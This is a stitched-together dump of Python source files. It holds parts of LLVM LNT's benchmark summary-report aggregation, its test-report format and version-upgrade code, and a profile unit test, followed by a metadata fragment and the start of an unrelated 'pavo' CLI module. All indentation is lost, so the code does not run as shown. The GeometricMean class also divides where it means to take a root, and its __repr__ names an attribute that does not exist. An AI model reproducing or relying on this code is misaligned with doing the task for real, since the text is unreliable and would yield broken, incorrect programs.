def _initialize(self, values):
self.sum = [0.] * len(values)
def _append(self, values):
for i, value in enumerate(values):
self.sum[i] += value
self.count += 1
class GeometricMean(Aggregation):
def __init__(self):
Aggregation.__init__(self)
self.count = 0
self.product = None
def getvalue(self):
return [value ** 1.0/self.count for value in self.product]
def __repr__(self):
return repr(self.geometric_mean)
def _initialize(self, values):
self.product = [1.] * len(values)
def _append(self, values):
for i, value in enumerate(values):
self.product[i] *= value
self.count += 1
class NormalizedMean(Mean):
def _append(self, values):
baseline = values[0]
Mean._append(self, [v/baseline
for v in values])
###
class SummaryReport(object):
def __init__(self, db, report_orders, report_machine_names,
report_machine_patterns):
self.db = db
self.testsuites = list(db.testsuite.values())
self.report_orders = list((name, orders)
for name, orders in report_orders)
self.report_machine_names = set(report_machine_names)
self.report_machine_patterns = list(report_machine_patterns)
self.report_machine_rexes = [
re.compile(pattern)
for pattern in self.report_machine_patterns
]
self.data_table = None
self.requested_machine_ids = None
self.requested_machines = None
self.runs_at_index = None
self.warnings = []
def build(self, session):
# Build a per-testsuite list of the machines that match the specified
# patterns.
def should_be_in_report(machine):
if machine.name in self.report_machine_names:
return True
for rex in self.report_machine_rexes:
if rex.match(machine.name):
return True
self.requested_machines = dict(
(ts, list(filter(should_be_in_report, session.query(ts.Machine).all())))
for ts in self.testsuites)
self.requested_machine_ids = dict(
(ts, [m.id for m in machines])
for ts, machines in self.requested_machines.items()
)
# First, collect all the runs to summarize on, for each index in the
# report orders.
self.runs_at_index = []
for _, orders in self.report_orders:
# For each test suite...
runs = []
for ts in self.testsuites:
# Find all the orders that match.
result = session.query(ts.Order.id).\
filter(ts.Order.llvm_project_revision.in_(
orders)).all()
ts_order_ids = [id for id, in result]
# Find all the runs that matchs those orders.
if not ts_order_ids:
ts_runs = []
else:
ts_runs = session.query(ts.Run).\
filter(ts.Run.order_id.in_(ts_order_ids)).\
filter(ts.Run.machine_id.in_(
self.requested_machine_ids[ts])).all()
if not ts_runs:
self.warnings.append(
'no runs for test suite %r in orders %r' % (
ts.name, orders))
runs.append((ts_runs, ts_order_ids))
self.runs_at_index.append(runs)
# Load the tests for each testsuite.
self.tests = dict((ts, dict((test.id, test)
for test in session.query(ts.Test)))
for ts in self.testsuites)
# Compute the base table for aggregation.
#
# The table is indexed by a test name and test features, which are
# either extracted from the test name or from the test run (depending
# on the suite).
#
# Each value in the table contains a array with one item for each
# report_order entry, which contains all of the samples for that
# entry..
#
# The table keys are tuples of:
# (<test name>,
# <metric>, # Value is either 'Compile Time' or 'Execution Time'.
# <arch>,
# <build mode>, # Value is either 'Debug' or 'Release'.
# <machine id>)
self.data_table = {}
self._build_data_table()
# Compute indexed data table by applying the indexing functions.
self._build_indexed_data_table()
# Normalize across all machines.
self._build_normalized_data_table()
# Build final organized data tables.
self._build_final_data_tables()
def _build_data_table(self):
def get_nts_datapoints_for_sample(ts, sample):
# Get the basic sample info.
run_id = sample[0]
machine_id = run_machine_id_map[run_id]
run_parameters = run_parameters_map[run_id]
# Get the test.
test = ts_tests[sample[1]]
# The test name for a sample in the NTS suite is just the name of
# the sample test.
test_name = test.name
# The arch and build mode are derived from the run flags.
arch = run_parameters['cc_target'].split('-')[0]
if '86' in arch:
arch = 'x86'
if run_parameters['OPTFLAGS'] == '-O0':
build_mode = 'Debug'
else:
build_mode = 'Release'
# Return a datapoint for each passing field.
for field_name, field, status_field in ts_sample_metric_fields:
# Ignore failing samples.
if status_field:
status_field_index = ts.get_field_index(status_field)
if sample[2 + status_field_index] == lnt.testing.FAIL:
continue
# Ignore missing samples.
field_index = ts.get_field_index(field)
value = sample[2 + field_index]
if value is None:
continue
# Otherwise, return a datapoint.
if field_name == 'compile_time':
metric = 'Compile Time'
else:
assert field_name == 'execution_time'
metric = 'Execution Time'
yield ((test_name, metric, arch, build_mode, machine_id),
value)
def get_compile_datapoints_for_sample(ts, sample):
# Get the basic sample info.
run_id = sample[0]
machine_id = run_machine_id_map[run_id]
run_parameters = run_parameters_map[run_id]
# Get the test.
test = ts_tests[sample[1]]
# Extract the compile flags from the test name.
base_name, flags = test.name.split('(')
assert flags[-1] == ')'
other_flags = []
build_mode = None
for flag in flags[:-1].split(','):
# If this is an optimization flag, derive the build mode from
# it.
if flag.startswith('-O'):
if '-O0' in flag:
build_mode = 'Debug'
else:
build_mode = 'Release'
continue
# If this is a 'config' flag, derive the build mode from it.
if flag.startswith('config='):
if flag == "config='Debug'":
build_mode = 'Debug'
else:
assert flag == "config='Release'"
build_mode = 'Release'
continue
# Otherwise, treat the flag as part of the test name.
other_flags.append(flag)
# Form the test name prefix from the remaining flags.
test_name_prefix = '%s(%s)' % (base_name, ','.join(other_flags))
# Extract the arch from the run info (and normalize).
arch = run_parameters['cc_target'].split('-')[0]
if arch.startswith('arm'):
arch = 'ARM'
elif '86' in arch:
arch = 'x86'
# The metric is fixed.
metric = 'Compile Time'
# Report the user and wall time.
for field_name, field, status_field in ts_sample_metric_fields:
if field_name not in ('user_time', 'wall_time'):
continue
# Ignore failing samples.
if status_field:
status_field_index = ts.get_field_index(status_field)
if sample[2 + status_field_index] == lnt.testing.FAIL:
continue
# Ignore missing samples.
field_index = ts.get_field_index(field)
value = sample[2 + field_index]
if value is None:
continue
# Otherwise, return a datapoint.
yield (('%s.%s' % (test_name_prefix, field_name), metric, arch,
build_mode, machine_id), value)
def get_datapoints_for_sample(ts, sample):
# The exact datapoints in each sample depend on the testsuite
if ts.name == 'nts':
return get_nts_datapoints_for_sample(ts, sample)
else:
assert ts.name == 'compile'
return get_compile_datapoints_for_sample(ts, sample)
# For each column...
for index, runs in enumerate(self.runs_at_index):
# For each test suite and run list...
for ts, (ts_runs, _) in zip(self.testsuites, runs):
ts_tests = self.tests[ts]
# Compute the metric fields.
ts_sample_metric_fields = [
(f.name, f, f.status_field)
for f in ts.Sample.get_metric_fields()]
# Compute a mapping from run id to run.
run_id_map = dict((r.id, r)
for r in ts_runs)
# Compute a mapping from run id to machine id.
run_machine_id_map = dict((r.id, r.machine.name)
for r in ts_runs)
# Preload the run parameters.
run_parameters_map = dict((r.id, r.parameters)
for r in ts_runs)
# Load all the samples for all runs we are interested in.
columns = [ts.Sample.run_id, ts.Sample.test_id]
columns.extend(f.column for f in ts.sample_fields)
samples = session.query(*columns).filter(
ts.Sample.run_id.in_(list(run_id_map.keys())))
for sample in samples:
run = run_id_map[sample[0]]
datapoints = list()
for key, value in get_datapoints_for_sample(ts, sample):
items = self.data_table.get(key)
if items is None:
items = [[]
for _ in self.report_orders]
self.data_table[key] = items
items[index].append(value)
def _build_indexed_data_table(self):
def is_in_execution_time_filter(name):
for key in ("SPEC", "ClamAV", "lencod", "minisat", "SIBSim4",
"SPASS", "sqlite3", "viterbi", "Bullet"):
if key in name:
return True
def compute_index_name(key):
test_name, metric, arch, build_mode, machine_id = key
# If this is a nightly test..
if test_name.startswith('SingleSource/') or \
test_name.startswith('MultiSource/') or \
test_name.startswith('External/'):
# If this is a compile time test, aggregate all values into a
# cumulative compile time.
if metric == 'Compile Time':
return ('Lmark', metric, build_mode, arch, machine_id), Sum
# Otherwise, this is an execution time. Index the cumulative
# result of a limited set of benchmarks.
assert metric == 'Execution Time'
if is_in_execution_time_filter(test_name):
return ('Lmark', metric, build_mode, arch, machine_id), Sum
# Otherwise, ignore the test.
return
# Otherwise, we have a compile time suite test.
# Ignore user time results for now.
if not test_name.endswith('.wall_time'):
return
# Index full builds across all job sizes.
if test_name.startswith('build/'):
project_name, subtest_name = re.match(
r'build/(.*)\(j=[0-9]+\)\.(.*)', str(test_name)).groups()
return (('Full Build (%s)' % (project_name,),
metric, build_mode, arch, machine_id),
NormalizedMean)
# Index single file tests across all inputs.
if test_name.startswith('compile/'):
file_name, stage_name, subtest_name = re.match(
r'compile/(.*)/(.*)/\(\)\.(.*)', str(test_name)).groups()
return (('Single File (%s)' % (stage_name,),
metric, build_mode, arch, machine_id),
Mean)
# Index PCH generation tests by input.
if test_name.startswith('pch-gen/'):
file_name, subtest_name = re.match(
r'pch-gen/(.*)/\(\)\.(.*)', str(test_name)).groups()
return (('PCH Generation (%s)' % (file_name,),
metric, build_mode, arch, machine_id),
Mean)
# Otherwise, ignore the test.
return
def is_missing_samples(values):
for samples in values:
if not samples:
return True
self.indexed_data_table = {}
for key, values in self.data_table.items():
# Ignore any test which is missing some data.
if is_missing_samples(values):
self.warnings.append("missing values for %r" % (key,))
continue
# Select the median values.
medians = [lnt.util.stats.median(samples)
for samples in values]
# Compute the index name, and ignore unused tests.
result = compute_index_name(key)
if result is None:
continue
index_name, index_class = result
item = self.indexed_data_table.get(index_name)
if item is None:
self.indexed_data_table[index_name] = item = index_class()
item.append(medians)
def _build_normalized_data_table(self):
self.normalized_data_table = {}
for key, indexed_value in self.indexed_data_table.items():
test_name, metric, build_mode, arch, machine_id = key
if test_name.startswith('Single File'):
aggr = Mean
else:
aggr = NormalizedMean
normalized_key = (test_name, metric, build_mode, arch)
item = self.normalized_data_table.get(normalized_key)
if item is None:
self.normalized_data_table[normalized_key] = \
item = aggr()
item.append(indexed_value.getvalue())
single_file_stage_order = [
'init', 'driver', 'syntax', 'irgen_only', 'codegen', 'assembly']
def _build_final_data_tables(self):
self.grouped_table = {}
self.single_file_table = {}
for key, normalized_value in self.normalized_data_table.items():
test_name, metric, build_mode, arch = key
# If this isn't a single file test, add a plot for it grouped by
# metric and build mode.
group_key = (metric, build_mode)
if not test_name.startswith('Single File'):
items = self.grouped_table[group_key] = self.grouped_table.get(
group_key, [])
items.append((test_name, arch,
normalized_value.getvalue()))
continue
# Add to the single file stack.
stage_name, = re.match(r'Single File \((.*)\)', test_name).groups()
try:
stack_index = self.single_file_stage_order.index(stage_name)
except ValueError:
stack_index = None
# If we don't have an index for this stage, ignore it.
if stack_index is None:
continue
# Otherwise, add the last value to the single file stack.
stack = self.single_file_table.get(group_key)
if stack is None:
self.single_file_table[group_key] = stack = \
[None] * len(self.single_file_stage_order)
stack[stack_index] = normalized_value.getvalue()[-1]
# If this is the last single file stage, also add a plot for it.
if stage_name == self.single_file_stage_order[-1]:
items = self.grouped_table[group_key] = self.grouped_table.get(
group_key, [])
values = normalized_value.getvalue()
baseline = values[0]
items.append(('Single File Tests', arch,
[v/baseline for v in values]))
```
#### File: lnt/testing/__init__.py
```python
import datetime
import json
import re
from lnt.util import logger
# We define the following constants for use as sample values by
# convention.
PASS = 0
FAIL = 1
XFAIL = 2
def normalize_time(t):
if isinstance(t, float):
t = datetime.datetime.utcfromtimestamp(t)
elif not isinstance(t, datetime.datetime):
t = datetime.datetime.strptime(t, '%Y-%m-%d %H:%M:%S')
return t.strftime('%Y-%m-%d %H:%M:%S')
class Report:
"""Information on a single testing run.
In the LNT test model, every test run should define exactly one
machine and run, and any number of test samples.
"""
def __init__(self, machine, run, tests, report_version=1):
"""Construct a LNT report file format in the given format version."""
self.machine = machine
self.run = run
self.tests = list(tests)
self.report_version = report_version
self.check()
def check(self):
"""Check that object members are adequate to generate an LNT
json report file of the version specified at construction when
rendering that instance.
"""
# Check requested report version is supported by this library
assert self.report_version <= 2, "Only v2 or older LNT report format supported."
assert isinstance(self.machine, Machine), "Unexpected type for machine."
assert (
self.machine.report_version == self.report_version
), "Mismatch between machine and report version."
assert isinstance(self.run, Run), "Unexpected type for run."
assert (
self.run.report_version == self.report_version
), "Mismatch between run and report version."
for t in self.tests:
if self.report_version == 2:
assert isinstance(t, Test), "Unexpected type for test"
assert (
t.report_version == self.report_version
), "Mismatch between test and report version."
else:
assert isinstance(t, TestSamples), "Unexpected type for test samples."
def update_report(self, new_tests_samples, end_time=None):
"""Add extra samples to this report, and update the end time of
the run.
"""
self.check()
self.tests.extend(new_tests_samples)
self.run.update_endtime(end_time)
self.check()
def render(self, indent=4):
"""Return a LNT json report file format of the version specified
at construction as a string, where each object is indented by
indent spaces compared to its parent.
"""
if self.report_version == 2:
return json.dumps({'format_version': str(self.report_version),
'machine': self.machine.render(),
'run': self.run.render(),
'tests': [t.render() for t in self.tests]},
sort_keys=True, indent=indent)
else:
return json.dumps({'Machine': self.machine.render(),
'Run': self.run.render(),
'Tests': [t.render() for t in self.tests]},
sort_keys=True, indent=indent)
class Machine:
"""Information on the machine the test was run on.
The info dictionary can be used to describe additional information
about the machine, for example the hardware resources or the
operating environment.
Machines entries in the database are uniqued by their name and the
entire contents of the info dictionary.
"""
def __init__(self, name, info={}, report_version=1):
self.name = str(name)
self.info = dict((str(key), str(value))
for key, value in info.items())
self.report_version = report_version
self.check()
def check(self):
"""Check object members are adequate to generate an LNT json
report file of the version specified at construction when
rendering that instance.
"""
# Check requested version is supported by this library
assert (
self.report_version <= 2
), "Only v2 or older supported for LNT report format Machine objects."
def render(self):
"""Return info from this instance in a dictionary that respects
the LNT report format in the version specified at construction
when printed as json.
"""
if self.report_version == 2:
d = dict(self.info)
d['Name'] = self.name
return d
else:
return {'Name': self.name,
'Info': self.info}
class Run:
"""Information on the particular test run.
At least one parameter must be supplied and is used as ordering
among several runs. When generating a report in format 1 or earlier,
both start_time and end_time are used for that effect and the
current date is used if their value is None.
As with Machine, the info dictionary can be used to describe
additional information on the run. This dictionary should be used to
describe information on the software-under-test that is constant
across the test run, for example the revision number being tested.
It can also be used to describe information about the current state
which could be useful in analysis, for example the current machine
load.
"""
def __init__(self, start_time=None, end_time=None, info={}, report_version=1):
if report_version <= 1:
if start_time is None:
start_time = datetime.datetime.utcnow()
if end_time is None:
end_time = datetime.datetime.utcnow()
self.start_time = normalize_time(start_time) if start_time is not None else None
self.end_time = normalize_time(end_time) if end_time is not None else None
self.info = dict()
# Convert keys/values that are not json encodable to strings.
for key, value in info.items():
key = str(key)
value = str(value)
self.info[key] = value
self.report_version = report_version
if self.report_version <= 1:
if 'tag' not in self.info:
raise ValueError("Missing 'tag' entry in 'info' dictionary")
if 'run_order' not in self.info:
raise ValueError("Missing 'run_order' entry in 'info' dictionary")
else:
if 'llvm_project_revision' not in self.info:
raise ValueError("Missing 'llvm_project_revision' entry in 'info' dictionary")
if '__report_version__' in info:
raise ValueError("'__report_version__' key is reserved")
if report_version == 1:
self.info['__report_version__'] = '1'
self.check()
def check(self):
"""Check object members are adequate to generate an LNT json
report file of the version specified at construction when
rendering that instance.
"""
# Check requested version is supported by this library
assert (
self.report_version <= 2
), "Only v2 or older supported for LNT report format Run objects."
if self.start_time is None and self.end_time is None and not bool(self.info):
raise ValueError("No data defined in this Run")
def update_endtime(self, end_time=None):
"""Update the end time of this run."""
if self.report_version <= 1 and end_time is None:
end_time = datetime.datetime.utcnow()
self.end_time = normalize_time(end_time) if end_time else None
self.check()
def render(self):
"""Return info from this instance in a dictionary that respects
the LNT report format in the version specified at construction
when printed as json.
"""
if self.report_version == 2:
d = dict(self.info)
if self.start_time is not None:
d['start_time'] = self.start_time
if self.end_time is not None:
d['end_time'] = self.end_time
return d
else:
info = dict(self.info)
if self.report_version == 1:
info['__report_version__'] = '1'
return {'Start Time': self.start_time,
'End Time': self.end_time,
'Info': info}
class Test:
"""Information on a particular test in the run and its associated
samples.
The server automatically creates test database objects whenever a
new test name is seen. Test should be used to generate report in
version 2 or later of LNT JSON report file format.
Test names are intended to be a persistent, recognizable identifier
for what is being executed. Currently, most formats use some form of
dotted notation for the test name, and this may become enshrined in
the format in the future. In general, the test names should be
independent of the software-under-test and refer to some known
quantity, for example the software under test. For example,
'CINT2006.403_gcc' is a meaningful test name.
The test info dictionary is intended to hold information on the
particular permutation of the test that was run. This might include
variables specific to the software-under-test . This could include,
for example, the compile flags the test was built with, or the
runtime parameters that were used. As a general rule, if two test
samples are meaningfully and directly comparable, then they should
have the same test name but different info paramaters.
"""
def __init__(self, name, samples, info={}, report_version=2):
self.name = name
self.samples = samples
self.info = dict()
# Convert keys/values that are not json encodable to strings.
for key, value in info.items():
key = str(key)
value = str(value)
self.info[key] = value
self.report_version = report_version
self.check()
def check(self):
"""Check object members are adequate to generate an LNT json
report file of the version specified at construction when
rendering that instance.
"""
# Check requested version is supported by this library and is
# valid for this object.
assert (
self.report_version == 2
), "Only v2 supported for LNT report format Test objects."
for s in self.samples:
assert isinstance(s, MetricSamples), "Unexpected type for metric sample."
assert (
s.report_version == self.report_version
), "Mismatch between test and metric samples."
def render(self):
"""Return info from this instance in a dictionary that respects
the LNT report format in the version specified at construction
when printed as json.
"""
d = dict(self.info)
d.update([s.render().popitem() for s in self.samples])
d['Name'] = self.name
return d
class TestSamples:
"""Information on a given test and its associated samples data.
Samples data must all relate to the same metric. When several
metrics are available for a given test, the convention is to have
one TestSamples per metric and to encode the metric into the name,
e.g. Benchmark1.exec. The server automatically creates test database
objects whenever a new test name is seen. TestSamples should only be
used to generate report in version 1 or earlier of LNT JSON report
file format.
Test names are intended to be a persistent, recognizable identifier
for what is being executed. Currently, most formats use some form of
dotted notation for the test name, and this may become enshrined in
the format in the future. In general, the test names should be
independent of the software-under-test and refer to some known
quantity, for example the software under test. For example,
'CINT2006.403_gcc' is a meaningful test name.
The test info dictionary is intended to hold information on the
particular permutation of the test that was run. This might include
variables specific to the software-under-test . This could include,
for example, the compile flags the test was built with, or the
runtime parameters that were used. As a general rule, if two test
samples are meaningfully and directly comparable, then they should
have the same test name but different info paramaters.
The report may include an arbitrary number of samples for each test
for situations where the same test is run multiple times to gather
statistical data.
"""
def __init__(self, name, data, info={}, conv_f=float):
"""Create an instance representing the samples converted into
floating-point values using the conv_f function.
"""
self.name = str(name)
self.info = dict((str(key), str(value))
for key, value in info.items())
self.data = list(map(conv_f, data))
def render(self):
"""Return info from this instance in a dictionary that respects
the LNT report format in the version specified at construction
when printed as json.
"""
return {'Name': self.name,
'Info': self.info,
'Data': self.data}
def __repr__(self):
# TODO remove this
return "TestSample({}): {} - {}".format(self.name,
self.data,
self.info)
class MetricSamples:
"""Samples data for a given metric of a given test.
An arbitrary number of samples for a given metric is allowed for
situations where the same metric is obtained several time for a
given test to gather statistical data.
MetricSamples should be used to generate report in version 2 or
later of LNT JSON report file format.
"""
def __init__(self, metric, data, conv_f=float, report_version=2):
self.metric = str(metric)
self.data = list(map(conv_f, data))
self.report_version = report_version
self.check()
def check(self):
"""Check object members are adequate to generate an LNT json
report file of the version specified at construction when
rendering that instance.
"""
# Check requested version is supported by this library and is
# valid for this object.
assert (
self.report_version == 2
), "Only v2 supported for LNT report format MetricSamples objects."
def add_samples(self, new_samples, conv_f=float):
"""Add samples for this metric, converted to float by calling
function conv_f.
"""
self.data.extend(map(conv_f, new_samples))
def render(self):
"""Return info from this instance in a dictionary that respects
the LNT report format in the version specified at construction
when printed as json.
"""
return {self.metric: self.data if len(self.data) > 1 else self.data[0]}
###
# Format Versioning
# We record information on the report "version" to allow the server to support
# some level of auto-upgrading data from submissions of older reports.
#
# We recorder the report version as a reserved key in the run information
# (primarily so that it can be accessed post-import on the server).
#
# Version 0 -- : initial (and unversioned).
#
# Version 1 -- 2012-04-12: run_order was changed to not be padded, and allow
# non-integral values.
#
# Version 2 -- 2017-06: Revamped json format
# - Directly uses lnt names (no 'info_key' names anymore)
# - Flatten Machine.Info and Run.Info into the Machine and Run records
# - One record for each test (not one record for test+metric) with one entry
# for each metric.
def _get_format_version(data):
format_version = data.get('format_version')
if format_version is not None:
return int(format_version)
# Older versions had a Run.Info.__report_version__ field
run = data.get('Run')
if run is not None:
info = run.get('Info')
if info is not None:
report_version = info.get('__report_version__', '0')
return int(report_version)
return None
def upgrade_0_to_1(data):
# We recompute the run_order here if it looks like this run_order was
# derived (we presume from sniffing a compiler).
run_info = data['Run']['Info']
run_order = run_info.get('run_order')
inferred_run_order = run_info.get('inferred_run_order')
# If the run order is missing, or wasn't the inferred one, do nothing.
if run_order is None or (run_order != inferred_run_order and
inferred_run_order is not None):
return data
# Otherwise, assume this run order was derived.
# Trim whitespace.
run_order = run_order.strip()
run_info['run_order'] = run_info['inferred_run_order'] = run_order
# If this was a production Clang build, try to recompute the src tag.
if 'clang' in run_info.get('cc_name', '') and \
run_info.get('cc_build') == 'PROD' and \
run_info.get('cc_src_tag') and \
run_order == run_info['cc_src_tag'].strip():
# Extract the version line.
version_ln = None
for ln in run_info.get('cc_version', '').split('\n'):
if ' version ' in ln:
version_ln = ln
break
else:
# We are done if we didn't find one.
return data
# Extract the build string.
m = re.match(r'(.*) version ([^ ]*) (\([^(]*\))(.*)',
version_ln)
if not m:
return data
cc_name, cc_version_num, cc_build_string, cc_extra = m.groups()
m = re.search('clang-([0-9.]*)', cc_build_string)
if m:
run_info['run_order'] = run_info['inferred_run_order'] = \
run_info['cc_src_tag'] = m.group(1)
data['Run']['Info']['__report_version__'] = "1"
return data
# Upgrading from version 1 to version 2 needs some schema in place
class _UpgradeSchema(object):
def __init__(self, metric_rename, machine_param_rename, run_param_rename):
self.metric_rename = metric_rename
self.machine_param_rename = machine_param_rename
self.run_param_rename = run_param_rename
_nts_upgrade = _UpgradeSchema(
metric_rename={
'.code_size': 'code_size',
'.compile': 'compile_time',
'.compile.status': 'compile_status',
'.exec': 'execution_time',
'.exec.status': 'execution_status',
'.hash': 'hash',
'.hash.status': 'hash_status',
'.mem': 'mem_bytes',
'.score': 'score',
}, machine_param_rename={
'name': 'hostname', # Avoid name clash with actual machine name.
}, run_param_rename={
'run_order': 'llvm_project_revision',
}
)
_compile_upgrade = _UpgradeSchema(
metric_rename={
'.mem': 'mem_bytes',
'.mem.status': 'mem_status',
'.size': 'size_bytes',
'.size.status': 'size_status',
'.sys': 'sys_time',
'.sys.status': 'sys_status',
'.user': 'user_time',
'.user.status': 'user_status',
'.wall': 'wall_time',
'.wall.status': 'wall_status',
}, machine_param_rename={
'hw.model': 'hardware',
'kern.version': 'os_version',
'name': 'hostname',
}, run_param_rename={
'run_order': 'llvm_project_revision',
}
)
_default_upgrade = _UpgradeSchema(
metric_rename={},
machine_param_rename={},
run_param_rename={
'run_order': 'llvm_project_revision',
}
)
_upgrades = {
'nts': _nts_upgrade,
'compile': _compile_upgrade
}
def upgrade_1_to_2(data, ts_name):
result = dict()
# Pull version and database schema to toplevel
result['format_version'] = '2'
report_version = data['Run']['Info'].pop('__report_version__', '1')
# We should not be in upgrade_1_to_2 for other versions
assert(report_version == '1')
tag = data['Run']['Info'].pop('tag', None)
if tag is not None and tag != ts_name:
raise ValueError("Importing '%s' data into '%s' testsuite" %
(tag, ts_name))
upgrade = _upgrades.get(tag)
if upgrade is None:
logger.warning("No upgrade schema known for '%s'\n" % tag)
upgrade = _default_upgrade
# Flatten Machine.Info into machine
Machine = data['Machine']
result_machine = {'name': Machine['Name']}
for key, value in Machine['Info'].items():
newname = upgrade.machine_param_rename.get(key, key)
if newname in result_machine:
raise ValueError("Name clash for machine info '%s'" % newname)
result_machine[newname] = value
result['machine'] = result_machine
# Flatten Result.Info into result
Run = data['Run']
result_run = {}
start_time = Run.get('Start Time')
if start_time is not None:
result_run['start_time'] = start_time
end_time = Run.get('End Time')
if end_time is not None:
result_run['end_time'] = end_time
for key, value in Run['Info'].items():
newname = upgrade.run_param_rename.get(key, key)
if newname in result_run:
raise ValueError("Name clash for run info '%s'" % newname)
result_run[newname] = value
result['run'] = result_run
# Merge tests
result_tests = list()
result_tests_dict = dict()
Tests = data['Tests']
for test in Tests:
test_Name = test['Name']
# Old testnames always started with 'tag.', split that part.
if len(test['Info']) != 0:
# The Info record didn't work with the v4 database anyway...
raise ValueError("Tests/%s: cannot convert non-empty Info record" %
test_Name)
tag_dot = '%s.' % ts_name
if not test_Name.startswith(tag_dot):
raise ValueError("Tests/%s: test name does not start with '%s'" %
(test_Name, tag_dot))
name_metric = test_Name[len(tag_dot):]
found_metric = False
for oldname, newname in upgrade.metric_rename.items():
assert(oldname.startswith('.'))
if name_metric.endswith(oldname):
name = name_metric[:-len(oldname)]
metric = newname
found_metric = True
break
if not found_metric:
# Fallback logic for unknown metrics: Assume they are '.xxxx'
name, dot, metric = name_metric.rpartition('.')
if dot != '.':
raise ValueError("Tests/%s: name does not end in .metric" %
test_Name)
logger.warning("Found unknown metric '%s'" % metric)
upgrade.metric_rename['.'+metric] = metric
result_test = result_tests_dict.get(name)
if result_test is None:
result_test = {'name': name}
result_tests_dict[name] = result_test
result_tests.append(result_test)
data = test['Data']
if metric not in result_test:
# Do not construct a list for the very common case of just a
# single datum.
if len(data) == 1:
data = data[0]
result_test[metric] = data
elif len(data) > 0:
# Transform the test data into a list
if not isinstance(result_test[metric], list):
result_test[metric] = [result_test[metric]]
result_test[metric] += data
result['tests'] = result_tests
return result
def upgrade_and_normalize_report(data, ts_name):
# Get the report version. V2 has it at the top level, older version
# in Run.Info.
format_version = _get_format_version(data)
if format_version is None:
data['format_version'] = '2'
format_version = 2
if format_version == 0:
data = upgrade_0_to_1(data)
format_version = 1
if format_version == 1:
data = upgrade_1_to_2(data, ts_name)
format_version = 2
if format_version != 2 or data['format_version'] != '2':
raise ValueError("Unknown format version")
if 'run' not in data:
import pprint
logger.info(pprint.pformat(data))
raise ValueError("No 'run' section in submission")
if 'machine' not in data:
raise ValueError("No 'machine' section in submission")
if 'tests' not in data:
raise ValueError("No 'tests' section in submission")
run = data['run']
if 'start_time' not in run:
time = datetime.datetime.utcnow().replace(microsecond=0).isoformat()
run['start_time'] = time
run['end_time'] = time
elif 'end_time' not in run:
run['end_time'] = run['start_time']
return data
__all__ = ['Report', 'Machine', 'Run', 'TestSamples']
```
#### File: tests/testing/profilev1impl.py
```python
import unittest, logging, sys, copy, tempfile, io
from lnt.testing.profile.profilev1impl import ProfileV1
from lnt.testing.profile.profile import Profile
logging.basicConfig(level=logging.DEBUG)
class ProfileV1Test(unittest.TestCase):
def setUp(self):
self.test_data = {
'counters': {'cycles': 12345.0, 'branch-misses': 200.0},
'disassembly-format': 'raw',
'functions': {
'fn1': {
'counters': {'cycles': 45.0, 'branch-misses': 10.0},
'data': [
[{}, 0x100000, 'add r0, r0, r0'],
[{'cycles': 100.0}, 0x100004, 'sub r1, r0, r0']
]
}
}
}
def test_serialize(self):
p = ProfileV1(copy.deepcopy(self.test_data))
with tempfile.NamedTemporaryFile() as f:
s = p.serialize(f.name)
self.assertTrue(ProfileV1.checkFile(f.name))
def test_deserialize(self):
p = ProfileV1(copy.deepcopy(self.test_data))
s = p.serialize()
fobj = io.BytesIO(s)
p2 = ProfileV1.deserialize(fobj)
self.assertEqual(p2.data, self.test_data)
def test_getFunctions(self):
p = ProfileV1(copy.deepcopy(self.test_data))
self.assertEqual(p.getFunctions(),
{'fn1': {'counters': {'cycles': 45.0, 'branch-misses': 10.0},
'length': 2}})
def test_saveFromRendered(self):
p = ProfileV1(copy.deepcopy(self.test_data))
s = Profile(p).render()
with tempfile.NamedTemporaryFile() as f:
Profile.saveFromRendered(s, filename=f.name)
p2 = ProfileV1.deserialize(open(f.name))
self.assertEqual(p2.data, self.test_data)
if __name__ == '__main__':
unittest.main(argv=[sys.argv[0], ])
``` |
{
"source": "jobveldhuis/jackman",
"score": 2
} |
#### File: pavo/cli/_cli.py
```python
from sys import argv
from pkg_resources import get_distribution, WorkingSet, DistributionNotFound
from tabulate import tabulate
from ._messages import echo, info, warn, error
from .errors import UnknownCommandError, UnspecifiedCommandError, InvalidExecutionDirectoryError
from pavo.cli import Broadcast
from pavo.helpers.files import cd_is_project
from pavo.helpers.config import get_config_value
from pavo.helpers.decorators import allow_outside_project
def _main(args=None):
"""Main entry point for the CLI application.
Args:
args (list): List of arguments to be parsed and used, first one being the command.
"""
if not args:
args = argv[1:]
if cd_is_project() and get_config_value('version') != get_distribution("pavo").version:
warn('Your Pavo configuration file version does not match your Pavo version.')
listener = Broadcast().subscribe()
try:
command, optional_args = _parse(args)
listener.start()
if optional_args is not None:
command(*optional_args)
else:
command()
except UnspecifiedCommandError:
warn('\nYou did not specify a Pavo command, so we are showing you some help.')
_help()
except Exception as e:
message = str(e) if len(str(e)) > 0 else f'Something went wrong, check the logs for more info: {repr(e)}'
error(message, e)
# TODO: Remove tmp folders when they are not used to serve a website locally
# Wait for all messages to be listened to by the listener daemon
while Broadcast().spy():
pass
exit()
def _get_commands():
"""Get a list of all commands based on name in 'pavo_commands' namespace.
This function finds installed modules and checks whether or not they are activated in the plugins section of the
Pavo configuration file. If this is the case, the 'pavo' entry points will be loaded and made
available to the CLI.
Returns:
dict: A dictionary of all commands mapped from name to function.
"""
commands = {}
# Create a WorkingSet with core Pavo functionality
ws = WorkingSet(entries=[])
ws.add(get_distribution('pavo'))
# Get all activated plugins and try adding them to the working set
try:
activated_plugins = get_config_value('plugins')
if isinstance(activated_plugins, list):
for plugin in activated_plugins:
try:
ws.add(get_distribution(plugin))
except DistributionNotFound:
warn(f'Could not load commands from {plugin}. Are you sure the module is installed?')
except TypeError as e:
error(f'Fatal error when trying to load commands. Please check your config file and the logs.', e)
except FileNotFoundError:
# If outside of a Pavo project use *all* installed packages to find Pavo commands.
ws = WorkingSet()
# Iterate over all entry points in the working set
for entry_point in ws.iter_entry_points('pavo_commands'):
if entry_point.name in commands:
warn(f'Could not load {entry_point.name} again, because it has been defined already.')
else:
commands[entry_point.name] = entry_point.load()
return commands
def _parse(args):
"""Parses arguments and throws an error when parsing to a command is not possible.
Args:
args (list): A list of arguments, starting with the command.
Returns:
(function, list): The function and optional arguments that are to be executed.
Raises:
UnspecifiedCommandError: No command was specified
InvalidExecutionDirectoryError: The current directory is not a Pavo project.
UnknownCommandError: The specified command has not been registered or is unknown.
"""
if len(args) < 1:
raise UnspecifiedCommandError
selected = args[0]
optional_args = args[1:]
available_commands = _get_commands()
if selected not in available_commands:
raise UnknownCommandError
func = available_commands[selected]
if not cd_is_project() and (not hasattr(func, 'allowed_outside_project') or func.allowed_outside_project is False):
raise InvalidExecutionDirectoryError
return func, optional_args
@allow_outside_project
def _help(specified_command=None):
